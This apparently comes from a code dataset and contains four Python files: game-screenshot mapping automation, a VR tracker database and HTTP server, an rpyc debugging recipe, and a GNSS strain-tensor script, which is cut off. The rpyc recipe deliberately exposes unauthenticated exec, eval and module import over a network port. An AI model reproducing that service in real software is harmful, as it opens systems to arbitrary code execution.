source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
interaction.py
|
# coding: utf-8
# Originally from
# https://github.com/PPartisan/THE_LONG_DARK
# Simply adapted to LINUX by Bernardo Alves Furtado
import threading
import time
import psutil
from pylab import rcParams
from pynput.keyboard import Key, Controller
import mapping
rcParams['figure.figsize'] = 12, 9.5
def is_tld_running():
return True
processes_numbers = psutil.pids()
for n in processes_numbers:
if 'tld.x86_64' == psutil.Process(n).name():
return True
def background(func, args):
th = threading.Thread(target=func, args=args)
th.start()
class Interaction:
def __init__(self):
self.recording = True
self.keyboard = Controller()
def start_recording(self):
print('Started recording')
self.recording = True
def stop_recording(self):
print('Stopped recording')
self.recording = False
def press(self):
print(f'Pressed the button')
self.keyboard.press(Key.f8)
self.keyboard.release(Key.f8)
def start_interactive_mapping(self, s_path, f_path):
print(f'Started!')
if self.recording:
while is_tld_running():
self.press()
coord = mapping.read_coords_from_screenshots(s_path)
mapping.write_coords_to_file(coord, f_path + "coords.txt", "a")
mapping.delete_screenshots(s_path)
time.sleep(30)
|
RMTRMS.py
|
import sqlite3
from sqlite3 import Error as sqliteError
import bottle
import threading
import triad_openvr
from openvr import OpenVRError
class SteamVRNotFoundError(Exception):
""" Raised when SteamVR is not installed"""
pass
class Tracker:
def __init__(self, vr=None, db=None, trackerID=None, serial=None):
self.db = db
if vr:
self.vr = vr
self.trackerID = trackerID
self.index = self.vr.devices[self.trackerID].index
self.serial = self.vr.devices[self.trackerID].get_serial()
self.db.set_tracker_active_status(self, True)
self.update_position()
self.name = db.get_tracker_name(self)
if self.name == None:
self.db.set_default_tracker_name(self)
self.name = self.db.get_tracker_name(self)
else:
self.serial = serial
self.name = self.db.get_tracker_name(self)
self.db.set_tracker_active_status(self, False)
def update_position(self):
"""Updates the position of the tracker if it is active.
"""
if self.active is True:
try:
pose = self.vr.devices[self.trackerID].get_pose_euler()
except AttributeError:
self.db.set_tracker_active_status(self, False)
return None
except KeyError:
self.db.set_tracker_active_status(self, False)
return None
if pose == [0, 0, 0, 0, 0, 0]:
self.db.set_tracker_active_status(self, False)
return None
self.x = pose[0]
self.z = pose[1]
self.y = pose[2]
self.pitch = pose[3]
self.yaw = pose[4]
self.roll = pose[5]
self.db.update_tracker_position(self)
else:
try:
pose = self.vr.devices[self.trackerID].get_pose_euler()
self.db.set_tracker_active_status(self, True)
except AttributeError:
pass
except KeyError:
pass
def rename(self, name):
"""Renames the tracker in the database
Arguments:
name {String} -- The new name for the tracker
"""
self.db.set_tracker_name(self, name)
self.name = name
def identify(self):
"""Turns on the rumble output of the tracker for 1 second
"""
self.db.vr.vr.triggerHapticPulse(self.index, 0, 1000000)
class Database:
"""Database object that can interact with an SQlite database, as well as OpenVR.
Arguments:
db {String} -- Path to database
"""
def __init__(self, db, vr=True):
self.databasePath = db
try:
self.db = sqlite3.connect(db)
except sqliteError as e:
print(e)
self.curs = self.db.cursor()
self.curs.execute("PRAGMA main.synchronous=NORMAL")
if vr:
try:
self.vr = triad_openvr.triad_openvr()
except OpenVRError:
raise SteamVRNotFoundError
def get_module_list(self):
"""Returns a list of modules.
Returns:
List -- list of Strings with module names.
"""
try:
moduleList = self.curs.execute("SELECT module FROM modules").fetchall()
for index, module in enumerate(moduleList):
moduleList[index] = module[0]
return moduleList
except sqliteError as e:
print(e)
return None
def get_tracker_list(self):
"""Returns a list of tracker objects.
Returns:
List -- list of Tracker objects
"""
try:
trackerList = self.curs.execute("SELECT serial FROM trackers").fetchall()
for index, tracker in enumerate(trackerList):
trackerList[index] = tracker[0]
activeTrackers = []
self.vr.update_device_list()
for device in self.vr.devices:
if "tracker" not in device:
continue
activeTrackers.append(Tracker(vr=self.vr, db=self, trackerID=device))
for tracker in activeTrackers:
try:
trackerList.remove(tracker.serial)
except ValueError:
pass
for index, tracker in enumerate(trackerList):
trackerList[index] = Tracker(db=self, serial=tracker)
trackerList.extend(activeTrackers)
return trackerList
except sqliteError as e:
print(e)
return None
def get_tracking_status(self, module):
"""Returns the tracking status of the specified module.
Arguments:
module {String} -- The module of which the tracking status will be returned.
Returns:
bool -- Tracking status of the module.
"""
try:
tracked = self.curs.execute(
"SELECT tracked FROM modules WHERE module=:module", (module,)
).fetchone()[0]
return tracked
except sqliteError as e:
print(e)
return None
def get_tracker_name(self, tracker):
"""Returns the name of the tracker.
Arguments:
tracker {Tracker} -- The tracker of which the name will be returned.
Returns:
String -- Name of specified module.
"""
try:
return self.curs.execute(
"SELECT name FROM trackers WHERE serial=:serial", (tracker.serial,)
).fetchone()[0]
except sqliteError as e:
print(e)
except TypeError:
return None
def get_assigned_tracker(self, module):
"""Returns the tracker assigned to a module.
Arguments:
module {String} -- The module whose tracker will be returned.
Returns:
tracker {Tracker} -- Tracker that is assigned to the module.
"""
try:
tracker = self.curs.execute(
"SELECT tracker FROM modules WHERE module=:module", {"module": module}
).fetchone()[0]
trackerList = self.get_tracker_list()
for trackerFromList in trackerList:
if tracker == trackerFromList.serial:
tracker = trackerFromList
break
return tracker
except sqliteError as e:
print(e)
return None
except TypeError:
return None
def get_assigned_module(self, tracker):
"""Returns the module which the tracker is assigned to
Arguments:
tracker {Tracker} -- Tracker whose assigned module will be returned
Returns:
module {String} -- Name of the module which the tracker is assigned to
"""
try:
module = self.curs.execute(
"SELECT module FROM modules WHERE tracker=:serial",
{"serial": tracker.serial},
).fetchone()[0]
return module
except sqliteError as e:
print(e)
return None
except TypeError:
return None
def get_module_position(self, module):
"""Returns the position of the specified module
Arguments:
module {String} -- The name of the module
"""
try:
position = self.curs.execute("SELECT positionX,positionY,yaw FROM positionOut WHERE module=:module", {"module" : module}).fetchone()
return position
except sqliteError as e:
print(e)
return None
def set_module_tracking_status(self, module, status):
"""Sets the tracking status of the specified module.
Arguments:
module {String} -- The module of which the status will be modified.
status {bool} -- The tracking status of the module. 1 for tracking, 0 for not tracking.
"""
try:
self.curs.execute(
"UPDATE modules SET tracked=:status WHERE module=:module",
(status, module),
)
except sqliteError as e:
print(e)
self.db.commit()
def set_tracker_active_status(self, tracker, status):
"""Sets the active status of the specified tracker in the database
Arguments:
tracker {Tracker} -- The active of which the status will be modified.
status {bool} -- The active status of the tracker.
"""
try:
self.curs.execute(
"UPDATE trackers SET active=:status WHERE serial=:serial",
(status, tracker.serial),
)
tracker.active = status
except sqliteError as e:
print(e)
self.db.commit()
def set_tracker_name(self, tracker, name):
"""Sets the name of the tracker.
Arguments:
tracker {Tracker} -- The tracker of which the name will be modified.
name {String} -- The name which will be assigned to the tracker.
"""
try:
self.curs.execute(
"UPDATE trackers SET name=:name WHERE serial=:serial",
(name, tracker.serial),
)
tracker.name = name
except sqliteError as e:
print(e)
self.db.commit()
def set_default_tracker_name(self, tracker):
try:
self.curs.execute(
"SELECT serial FROM trackers WHERE serial=:serial;",
{"serial": tracker.serial},
)
params = {
"name": "Tracker " + str(self.curs.lastrowid),
"serial": tracker.serial,
}
self.curs.execute(
"UPDATE trackers SET name=:name WHERE serial=:serial AND name IS NULL;",
params,
)
except sqliteError as e:
print(e)
self.db.commit()
def assign_tracker(self, module, tracker):
"""Assigns a tracker serial to a module.
Arguments:
module {String} -- The module to which the tracker will be assigned.
tracker {Tracker} -- The tracker which will be assigned to the module
"""
params = {"module": module, "tracker": tracker.serial}
sql = """
UPDATE modules SET tracker=:tracker WHERE module=:module
"""
try:
self.curs.execute(
"UPDATE modules SET tracker=NULL, tracked=0 WHERE tracker=:tracker",
{"tracker": tracker.serial},
)
self.curs.execute(sql, params)
except sqliteError as e:
print(e)
self.db.commit()
def update_tracker_position(self, tracker):
"""Updates the position of the tracker in the database
Arguments:
tracker {Tracker} -- The tracker whose position will be updated in the database
"""
if tracker.active == False:
print("Error: Tracker is not tracked\n")
return None
params = {
"serial": tracker.serial,
"active": tracker.active,
"positionX": tracker.x,
"positionY": tracker.y,
"positionZ": tracker.z,
"yaw": tracker.yaw,
"pitch": tracker.pitch,
"roll": tracker.roll,
}
sql = """
UPDATE trackers SET positionX=:positionX,
positionY=:positionY,
positionZ=:positionZ,
yaw=:yaw,
pitch=:pitch,
roll=:roll
WHERE serial = :serial;
"""
try:
self.curs.execute(sql, params)
except sqliteError as e:
print(e)
try:
self.curs.execute("SELECT changes()")
if self.curs.fetchone()[0] is 0:
sql = """
INSERT INTO trackers (serial,
active,
positionX,
positionY,
positionZ,
yaw,
pitch,
roll)
VALUES(:serial, :active, :positionX, :positionY, :positionZ, :yaw, :pitch, :roll);
"""
try:
self.curs.execute(sql, params)
except sqliteError as e:
print(e)
# update name based on ID if no name is given
params2 = {
"name": "Tracker " + str(self.curs.lastrowid),
"serial": params["serial"],
}
sql = """
UPDATE trackers SET name=:name WHERE serial = :serial AND name IS NULL;
"""
self.curs.execute(sql, params2)
except sqliteError as e:
print(e)
self.db.commit()
def remove_tracker(self, tracker):
"""Removes the specified tracker from the database
parameters:
tracker {Tracker} -- The tracker will be deleted
"""
try:
self.curs.execute(
"DELETE FROM trackers WHERE serial = :serial",
{"serial": tracker.serial},
)
self.curs.execute(
"UPDATE modules SET tracker=NULL, tracked=0 WHERE tracker=:serial",
{"serial": tracker.serial},
)
self.db.commit()
except sqliteError as e:
print(e)
class QuietServer(bottle.ServerAdapter):
"""An adapted server from https://stackoverflow.com/a/16056443
"""
def run(self, handler):
from wsgiref.simple_server import make_server, WSGIRequestHandler
class QuietHandler(WSGIRequestHandler):
def log_request(*args, **kw): pass
self.options['handler_class'] = QuietHandler
self._server = make_server(self.host, self.port, handler, **self.options)
self._server.serve_forever()
def stop(self):
self._server.shutdown()
self._server.server_close()
class Server:
"""Server object that returns 7 values
The output is in the format:
{Bool} {Float} {Float} {Float} {Float} {Float} {Float}
These correspond to:
Tracker Active -- Tracker X Position -- Tracker Y Position -- Tracker Yaw -- Module X Position -- Module Y Position -- Module Yaw
Returns:
Server {QuietServer} -- The server the application is using
"""
def __init__(self, databasePath=None, host="0.0.0.0", port=8000):
self._database = Database(databasePath)
self._host = host
self._port = port
self._app = bottle.Bottle()
self._route()
self.server = QuietServer(host=self._host, port=self._port)
def _route(self):
self._app.route("/modules/<module_name>", callback=self.get_module)
def start(self):
"""Run the server
"""
self._app.run(server=self.server)
def stop(self):
"""Stop the server
"""
self.server.stop()
self._app.close()
def stop_thread(self):
threading.Thread(target=self.stop, daemon=True).start()
def get_module(self, module_name=None):
"""Return the desired module's tracker and position information
Keyword Arguments:
module_name {String} -- Name of the module as it appears in the database (case sensitive) (default: {None})
Returns:
Active {Bool} -- The active status of the assigned tracker.
Tracker Position X {Float} -- X position of the assigned tracker.
Tracker Position Y {Float} -- Y position of the assigned tracker.
Tracker Yaw {Float} -- Yaw of the assigned tracker.
Module Position X {Float} -- Desired X position of the specified module
Module Position Y {Float} -- Desired Y position of the specified module
Module Yaw {Float} -- Desired yaw of the specified module
"""
if self._database.get_tracking_status(module_name):
return "0 0 0 0 0 0 0"
else:
tracker = self._database.get_assigned_tracker(module_name)
if tracker is None:
return "0 0 0 0 0 0 0"
moduleX, moduleY, moduleYaw = self._database.get_module_position(module_name)
if tracker.active:
response = "{:b} {:f} {:f} {:f} {:f} {:f} {:f}".format(
1, tracker.x, tracker.y, tracker.yaw, moduleX, moduleY, moduleYaw
)
else:
response = "0 0 0 0 0 0 0"
return response
|
recipe-580721.py
|
# Author: Miguel Martinez Lopez
#
# This code require rpyc.
# You can install rpyc typing:
# pip install rpyc
#
# Run this code and in an another interactive interpreter write this:
# >>> import rpyc
# ... c = rpyc.classic.connect("localhost")
# >>> c.execute("from Tkinter import Label; label=Label(app, text='a label')")
# ... c.execute("label.pack()")
# >>> app = c.eval("app")
# >>> app.responsive_button.invoke()
from rpyc.utils.server import ThreadedServer
from rpyc.utils.classic import DEFAULT_SERVER_PORT
from rpyc.core.service import Service, ModuleNamespace
from rpyc.lib.compat import execute, is_py3k
class PublicService(Service):
exposed_namespace = {}
def on_connect(self):
self._conn._config.update(dict(
allow_all_attrs = True,
allow_pickle = True,
allow_getattr = True,
allow_setattr = True,
allow_delattr = True,
import_custom_exceptions = True,
instantiate_custom_exceptions = True,
instantiate_oldstyle_exceptions = True,
))
# shortcuts
self._conn.modules = ModuleNamespace(self._conn.root.getmodule)
self._conn.eval = self._conn.root.eval
self._conn.execute = self._conn.root.execute
self._conn.namespace = self._conn.root.namespace
if is_py3k:
self._conn.builtin = self._conn.modules.builtins
else:
self._conn.builtin = self._conn.modules.__builtin__
self._conn.builtins = self._conn.builtin
def exposed_execute(self, text):
"""execute arbitrary code (using ``exec``)"""
execute(text, PublicService.exposed_namespace)
def exposed_eval(self, text):
"""evaluate arbitrary code (using ``eval``)"""
return eval(text, PublicService.exposed_namespace)
def exposed_getmodule(self, name):
"""imports an arbitrary module"""
return __import__(name, None, None, "*")
def exposed_getconn(self):
"""returns the local connection instance to the other side"""
return self._conn
if __name__ == "__main__":
import threading
from Tkinter import Tk, Button
import tkMessageBox
class App(Tk):
def __init__(self):
Tk.__init__(self)
self.responsive_button = Button(self, text="It's responsive", command = lambda:tkMessageBox.showinfo("alert window", "It's responsive!"))
self.responsive_button.pack()
app = App()
# Add here all the exposed objects in the shared namespace
PublicService.exposed_namespace = {"app":app}
t = threading.Thread(target=lambda: ThreadedServer(PublicService, hostname = "localhost", port=DEFAULT_SERVER_PORT).start())
t.daemon=True
t.start()
app.mainloop()
|
StrainTensor.py
|
#! /usr/bin/python
#-*- coding: utf-8 -*-
from __future__ import print_function
import sys
import os
import time
from datetime import datetime
from copy import deepcopy
from math import degrees, radians, floor, ceil
import numpy
from scipy.spatial import Delaunay
import argparse
from pystrain.strain import *
from pystrain.geodesy.utm import *
from pystrain.iotools.iparser import *
import pystrain.grid
Version = 'StrainTensor.py Version: 1.0-r1'
STRAIN_OUT_FILE = 'strain_info.dat'
STATISTICS_FILE = 'strain_stats.dat'
def cut_rectangle(xmin, xmax, ymin, ymax, sta_lst, sta_list_to_degrees=False):
""" Filter stations that are located within a rectange. The rectangle is
+-------+--ymax
| |
+-------+--ymin
| |
xmin xmax
The function will return a new list, where for each of the stations,
the following is true:
* xmin <= station.lon <= xmax and
* ymin <= station.lat <= ymax
If the argument 'sta_list_to_degrees' is set to True, then before
comaring, each of the station's lon and lat are transformed to degrees
(they are supposed to be in radians).
"""
new_sta_lst = []
for sta in sta_lst:
if sta_list_to_degrees:
slon = degrees(sta.lon)
slat = degrees(sta.lat)
else:
slon = sta.lon
slat = sta.lat
if slon >= xmin and slon <= xmax and slat >= ymin and slat <= ymax:
new_sta_lst.append(sta)
return new_sta_lst
def write_station_info(sta_lst, filename='station_info.dat'):
""" Write station information to an output file. sta_list if a list of
Stations.
Station information are written as:
Station Longtitude Latitude Ve Vn sVe sVn
deg. deg mm/yr
The file to be written is named as $filename
"""
with open(filename, 'w') as fout:
print('{:^10s} {:^10s} {:^10s} {:7s} {:7s} {:7s} {:7s}'.format(
'Station', 'Longtitude', 'Latitude', 'Ve', 'Vn', 'sVe', 'sVn'),
file=fout)
print('{:^10s} {:^10s} {:^10s} {:7s} {:7s} {:7s} {:7s}'.format(
'', 'deg.', 'deg', 'mm/yr', 'mm/yr', 'mm/yr', 'mm/yr'),
file=fout)
for idx, sta in enumerate(sta_lst):
print('{:10s} {:+10.5f} {:10.5f} {:+7.2f} {:+7.2f} {:+7.3f} {:+7.3f}'.format(
sta.name, degrees(sta.lon), degrees(sta.lat), sta.ve*1e03,
sta.vn*1e03, sta.se*1e03, sta.sn*1e03), file=fout)
return
def print_model_info(fout, cmd, clargs):
""" Write basic information to an open output stream (e.g. a file).
"""
print('{:}'.format(Version), file=fout)
print('Command used:\n\t{:}'.format(' '.join(cmd)), file=fout)
print('Run at: {:}'.format(datetime.now().strftime('%c')), file=fout)
print('Command line switches/options parsed:', file=fout)
for key in clargs:
print('\t{:20s} -> {:}'.format(key, clargs[key]), file=fout)
return
def compute__(igrd, sta_list_utm, utm_lcm, fout, fstats, vprint_fun, **dargs):
""" Function to perform the bulk of a Strain Tensor estimation.
For each of the grid cells, a ShenStrain object will be created, using
the list of stations and the **dargs options.
Args:
grd (pystrain::Grid): The grid; one straintensor per cell is
estimated (at the centre of the grid)
sta_list_utm (list of Station): The list of stations to be used for
strain tensor estimation
utmzone (float): The UTM zone used to convert ellipsoidal to
UTM coordinates.
fout (output stream): An (open) output stream where estimation results
(aka strain information) are to be written
fstats (output stream): An (open) output stream where estimation
statistics are written
vprint_fun (function) : A function that handles printing. Based on
user options we may want or not to print
verbose information. This function does exactly
that. Normally, this function is just the
normal print function or a no-opt, see vprint(...)
defined in __main__
**dargs (dictionary) : A list of parameters to use when constructing
the individual Strain Tensors
Warning:
The output streams are passed in open but are closed by the function!
Leaving the streams open, may cause not proper reporting of results
in Python v2.x and in multithreading mode (probably the streams are
not flushed before returning or something). Anyway, always close the
streams before exiting.
"""
#print('--> Thread given grid : X:{:}/{:}/{:} Y:{:}/{:}/{:}'.format(igrd.x_min, igrd.x_max, igrd.x_step, igrd.y_min, igrd.y_max, igrd.y_step))
node_nr, nodes_estim = 0, 0
for x, y in igrd:
clat, clon = radians(y), radians(x)
#print('--> computing tensor at lon {:}, lat {:}'.format(x, y))
N, E, ZN, lcm = ell2utm(clat, clon, Ellipsoid("wgs84"), utm_lcm)
#assert ZN == utmzone
assert utm_lcm == lcm
vprint_fun('[DEBUG] Grid point at {:+8.4f}, {:8.4f} or E={:}, N={:}'.format(
x, y, E, N))
if not dargs['multiproc_mode']:
print('[DEBUG] {:5d}/{:7d}'.format(node_nr+1, grd.xpts*grd.ypts), end="\r")
## Construct the Strain instance, with all args (from input)
# sstr = ShenStrain(E, N, sta_list_utm, **dargs)
sstr = ShenStrain(E, N, clat<0e0, sta_list_utm, **dargs)
## check azimouth coverage (aka max β angle)
if degrees(max(sstr.beta_angles())) <= dargs['max_beta_angle']:
try:
sstr.estimate()
vprint_fun('[DEBUG] Computed tensor at {:+8.4f} {:+8.4f} for node {:3d}/{:3d}'.format(x, y, node_nr+1, grd.xpts*grd.ypts))
sstr.print_details_v2(fout, utm_lcm)
if fstats: print('{:+9.4f} {:+10.4f} {:6d} {:14.2f} {:10.2f} {:12.3f}'.format(x,y,len(sstr.__stalst__), sstr.__options__['d_coef'],sstr.__options__['cutoff_dis'], sstr.__sigma0__), file=fstats)
nodes_estim += 1
except RuntimeError:
vprint_fun('[DEBUG] Too few observations to estimate strain at {:+8.4f}, {:8.4f}. Point skipped.'.format(x,y))
except ArithmeticError:
vprint_fun('[DEBUG] Failed to compute parameter VcV matrix for strain at {:+8.4f}, {:8.4f}. Point skipped'.format(x,y))
else:
vprint_fun('[DEBUG] Skipping computation at {:+8.4f},{:8.4f} because of limited coverage (max_beta= {:6.2f}deg.)'.format(x, y, degrees(max(sstr.beta_angles()))))
node_nr += 1
print('[DEBUG] Estimated Strain Tensors for {} out of {} nodes'.format(nodes_estim, node_nr))
fout.close()
if fstats: fstats.close()
## If only the formatter_class could be:
##+ argparse.RawTextHelpFormatter|ArgumentDefaultsHelpFormatter ....
## Seems to work with multiple inheritance!
class myFormatter(
argparse.ArgumentDefaultsHelpFormatter,
argparse.RawTextHelpFormatter):
pass
parser = argparse.ArgumentParser(
formatter_class=myFormatter,
description='Estimate Strain Tensor(s) from GNSS derived velocities.',
epilog=('''National Technical University of Athens,
Dionysos Satellite Observatory\n
Send bug reports to:
Xanthos Papanikolaou, xanthos@mail.ntua.gr
Dimitris Anastasiou,dganastasiou@gmail.com
September, 2021'''))
parser.add_argument('-i', '--input-file',
default=argparse.SUPPRESS,
metavar='INPUT_FILE',
dest='gps_file',
required=True,
help='The input file. This must be an ascii file containing the columns: \'station-name longtitude latitude Ve Vn SigmaVe SigmaVn Sne time-span\'. Longtitude and latitude must be given in decimal degrees; velocities (in east and north components) in mm/yr. Columns should be seperated by whitespaces. Note that at his point the last two columns (aka Sne and time-span) are not used, so they could have random values.')
parser.add_argument('--x-grid-step',
default=0.5,
metavar='X_GRID_STEP',
dest='x_grid_step',
type=float,
required=False,
help='The x-axis grid step size in degrees. This option is only relevant if the program computes more than one strain tensors.')
parser.add_argument('--y-grid-step',
default=0.5,
metavar='Y_GRID_STEP',
dest='y_grid_step',
type=float,
required=False,
help='The y-axis grid step size in degrees. This option is only relevant if the program computes more than one strain tensors.')
parser.add_argument('-m', '--method',
default='shen',
metavar='METHOD',
dest='method',
choices=['shen', 'veis'],
required=False,
help='Choose a method for strain estimation. If \'shen\' is passed in, the estimation will follow the algorithm described in Shen et al, 2015, using a weighted least squares approach. If \'veis\' is passed in, then the region is going to be split into delaneuy triangles and a strain estimated in each barycenter.')
parser.add_argument('-r', '--region',
default=argparse.SUPPRESS,
metavar='REGION',
dest='region',
help='Specify a region; any station (in the input file) falling outside will be ommited. The region should be given as a rectangle, specifying min/max values in longtitude and latitude (using decimal degrees). E.g. \"[...] --region=21.0/23.5/36.0/38.5 [...]\"',
required=False)
parser.add_argument('-c', '--cut-excess-stations',
dest='cut_outoflim_sta',
help='This option is only considered if the \'-r\' option is set. If this this option is enabled, then any station (from the input file) outside the region limit (passed in via the \'-r\' option) is not considered in the strain estimation.',
action='store_true')
parser.add_argument('-b', '--barycenter',
dest='one_tensor',
action='store_true',
help='Only estimate one strain tensor, at the region\'s barycentre.')
parser.add_argument('--max-beta-angle',
default=180,
metavar='MAX_BETA_ANGLE',
dest='max_beta_angle',
type=float,
required=False,
help='Only relevant for \'--mehod=shen\'. Before estimating a tensor, the angles between consecutive points are computed. If the max angle is larger than max_beta_angle (in degrees), then the point is ommited (aka no tensor is computed). This option is used to exclude points from the computation tha only have limited geometric coverage (e.g. the edges of the grid).')
parser.add_argument('-t', '--weighting-function',
default='gaussian',
metavar='WEIGHTING_FUNCTION',
dest='ltype',
choices=['gaussian', 'quadratic'],
required=False,
help='Only relevant for \'--mehod=shen\'. Choose between a \'gaussian\' or a \'quadratic\' spatial weighting function.')
parser.add_argument('--Wt',
default=24,
metavar='Wt',
dest='Wt',
type=int,
required=False,
help='Only relevant for \'--mehod=shen\' and if \'d-param\' is not passed in. Let W=Σ_i*G_i, the total reweighting coefficients of the data, and let Wt be the threshold of W. For a given Wt, the smoothing constant D is determined by Wd=Wt . It should be noted that W is a function of the interpolation coordinate, therefore for the same Wt assigned, D varies spatially based on the in situ data strength; that is, the denser the local data array is, the smaller is D, and vice versa.')
parser.add_argument('--dmin',
default=1,
metavar='D_MIN',
dest='dmin',
type=int,
required=False,
help='Only relevant for \'--mehod=shen\' and if \'d-param\' is not passed in. This is the lower limit for searching for an optimal D-parameter value. Unit is km.')
parser.add_argument('--dmax',
default=500,
metavar='D_MAX',
dest='dmax',
type=int,
required=False,
help='Only relevant for \'--mehod=shen\' and if \'d-param\' is not passed in. This is the upper limit for searching for an optimal d-param value. Unit is km.')
parser.add_argument('--dstep',
default=2,
metavar='D_STEP',
dest='dstep',
type=int,
required=False,
help='Only relevant for \'--mehod=shen\' and if \'d-param\' is not passed in. This is the step size for searching for an optimal d-param value. Unit is km.')
parser.add_argument('--d-param',
default=None,
metavar='D_PARAMETER',
dest='d_coef',
type=float,
required=False,
help='Only relevant for \'--mehod=shen\'. This is the \'D\' parameter for computing the spatial weights. If this option is used, then the parameters: dmin, dmax, dstep and Wt are not used.')
parser.add_argument('-g', '--generate-statistics',
dest='generate_stats',
help='Only relevant when \'--mehod=shen\' and \'--barycenter\' is not set. This option will create an output file, named \'strain_stats.dat\', where estimation info and statistics will be written.',
action='store_true')
parser.add_argument('--verbose',
dest='verbose_mode',
help='Run in verbose mode (show debugging messages)',
action='store_true')
parser.add_argument('--multicore',
dest='multiproc_mode',
help='Run in multithreading mode',
action='store_true')
parser.add_argument('-v',
dest='version',
help='Display version and exit.',
action='store_true')
if __name__ == '__main__':
## Wait!! maybe the user just paseed in "-v" without an input file. Do not
##+ resolve the parser yet (it ll cause an error)
if len(sys.argv[1:]) == 1 and sys.argv[1] == "-v":
print('{}'.format(Version))
sys.exit(0)
## Time the program (for opt/ing purpose only)
start_time = time.time()
## Parse command line arguments and stack them in a dictionary
args = parser.parse_args()
dargs = vars(args)
## Wait!! maybe we only want the version
if args.version:
print('{}'.format(Version))
sys.exit(0)
## Verbose print (function only exists in verbose mode)
vprint = print if args.verbose_mode else lambda *a, **k: None
## if in mutlithreading mode, load the module
if args.multiproc_mode:
if args.method == 'shen':
import multiprocessing
cpu_count = multiprocessing.cpu_count()
print("[DEBUG] Using multithreaded version; available CPU's: {:02d}".format(
cpu_count))
else:
print("[DEBUG] Multithreading is only available when using shen method; ignoring the \"--multicore\" switch!")
## import dill module for windows multithreading processing
if args.multiproc_mode and os.name == 'nt':
print("[DEBUG] Import dill module for windows multithreading processing")
import dill
## If needed, open a file to write model info and statistics
fstats = open(STATISTICS_FILE, 'w') if args.generate_stats else None
if fstats: print_model_info(fstats, sys.argv, dargs)
## Parse stations from input file; at input, station coordinates are in decimal
##+ degrees and velocities are in mm/yr.
## After reading, station coordinates are in radians and velocities are in
##+ m/yr.
if not os.path.isfile(args.gps_file):
print('[ERROR] Cannot find input file \'{}\'.'.format(
args.gps_file), file=sys.stderr)
sys.exit(1)
try:
sta_list_ell = parse_ascii_input(args.gps_file, args.method=='shen')
except ValueError as err:
print(err)
print('[ERROR] Failed to parse input file: \"{:}\"'.format(args.gps_file))
sys.exit(1)
print('[DEBUG] Reading station coordinates and velocities from {}'.format(
args.gps_file))
print('[DEBUG] Number of stations parsed: {}'.format(len(sta_list_ell)))
## If a region is passed in, resolve it (from something like
##+ '21.0/23.5/36.0/38.5'). Note that limits are in dec. degrees.
##+ If cutting out-of-limits stations option is set, or method is veis, then
##+ only keep the stations that fall within it.
## The region coordinates (min/max pairs) should be given in decimal degrees.
if 'region' in args:
try:
lonmin, lonmax, latmin, latmax = [ float(i) for i in args.region.split('/') ]
if args.cut_outoflim_sta or args.method == 'veis':
Napr = len(sta_list_ell)
# Note that we have to convert radians to degrees for station
#+ coordinates, hence 'sta_list_to_degrees=True'
sta_list_ell = cut_rectangle(lonmin, lonmax, latmin, latmax, sta_list_ell, True)
Npst = len(sta_list_ell)
vprint('[DEBUG] Stations filtered to fit input region: {:7.3f}/{:7.3f}/{:7.3f}/{:7.3f}'.format(lonmin, lonmax, latmin, latmax))
vprint('[DEBUG] {:4d} out of original {:4d} stations remain to be processed.'.format(Npst, Napr))
if Npst < 3:
print('[DEBUG] Left with only {:d} stations! Cannot do anything'.format(Npst))
sys.exit(0)
except:
## TODO we should exit with error here
print('[ERROR] Failed to parse region argument \"{:}\"'.format(
args.region), file=sys.stderr)
## Filter out stations that are never going to be used. This is an opt!
## This is only needed when the used has specified:
##+ '[...] --region=a/b/c/d --method='shen' [...]' and NOT --cut-excess-station
##+ because:
##+ * If there is no region, we suppose that we want all the region covered
##+ by the stations
##+ * If method='veis' we are using Delaneuey triangles anyway
##+ * If '--cut-excess-station' is set, we have already cut-off any stations
##+ outside the wanted region
## This is performed as follows:
##+ 1. Compute distance from centre of region to point (lonmax, latmax), aka R
##+ 2. Compute D: User has specified 'D_PARAMETER'? D=2*D_PARAMETER else D=2*D_MAX
##+ 3. Compute C: WEIGHTING_FUNCTION='gaussian'? C=R+D*2.15 else C=R+D*10
##+ 4. Filter out any station that has distance from the centre > C
## Note that all distances are computed via the Haversine formula and all units
##+ are Km
if 'region' in args and not args.method == 'veis' and not args.cut_outoflim_sta:
vprint('[DEBUG] Filtering stations based on their distance from region barycentre.')
Napr = len(sta_list_ell)
mean_lon, mean_lat = radians(lonmin+(lonmax-lonmin)/2e0), radians(latmin+(latmax-latmin)/2e0)
bc = Station(lon=mean_lon, lat=mean_lat)
endpt = Station(lon=radians(lonmax), lat=radians(latmax))
cutoffdis = abs(endpt.haversine_distance(bc)/1e3) # barycentre to endpoint (km)
d = 2e0*(args.d_coef if args.d_coef is not None else args.dmax)
cutoffdis += d * (2.15e0 if args.ltype == 'gaussian' else 10e0) # in km
vprint('[DEBUG] Using cut-off distance {:10.3f}km'.format(cutoffdis))
sta_list_ell = [ s for s in sta_list_ell if s.haversine_distance(bc)/1e3 <= cutoffdis ]
Npst = len(sta_list_ell)
print('[DEBUG] {:4d} out of original {:4d} stations remain to be processed.'.format(Npst, Napr))
## Make a new station list (copy of the original one), where all coordinates
##+ are in UTM. All points should belong to the same ZONE.
## Note that station ellipsoidal coordinates are in radians while the
##+ cartesian (projection) coordinates are in meters.
##
## TODO is this mean_lon the optimal?? or should it be the region's mean longtitude
##
mean_lon = degrees(sum([ x.lon for x in sta_list_ell ]) / len(sta_list_ell))
#utm_zone = floor(mean_lon/6)+31
#utm_zone = utm_zone + int(utm_zone<=0)*60 - int(utm_zone>60)*60
lcm = radians(floor(mean_lon))
#print('[DEBUG] Mean longtitude is {} deg.; using Zone = {} for UTM'.format(mean_lon, utm_zone))
sta_list_utm = deepcopy(sta_list_ell)
for idx, sta in enumerate(sta_list_utm):
N, E, Zone, lcm = ell2utm(sta.lat, sta.lon, Ellipsoid("wgs84"), lcm)
sta_list_utm[idx].lon = E
sta_list_utm[idx].lat = N
# assert Zone == utm_zone, "[ERROR] Invalid UTM Zone."
vprint('[DEBUG] Station list transformed to UTM.')
## Open file to write Strain Tensor estimates; write the header
fout = open(STRAIN_OUT_FILE, 'w')
vprint('[DEBUG] Strain info written in file: {}'.format(STRAIN_OUT_FILE))
print('{:^9s} {:^9s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s}'.format('Latitude', 'Longtitude', 'vx+dvx', 'vy+dvy', 'w+dw', 'exx+dexx', 'exy+dexy', 'eyy+deyy', 'emax+demax', 'emin+demin', 'shr+dshr', 'azi+dazi', 'dilat+ddilat', 'sec. invariant+dsec inv.'), file=fout)
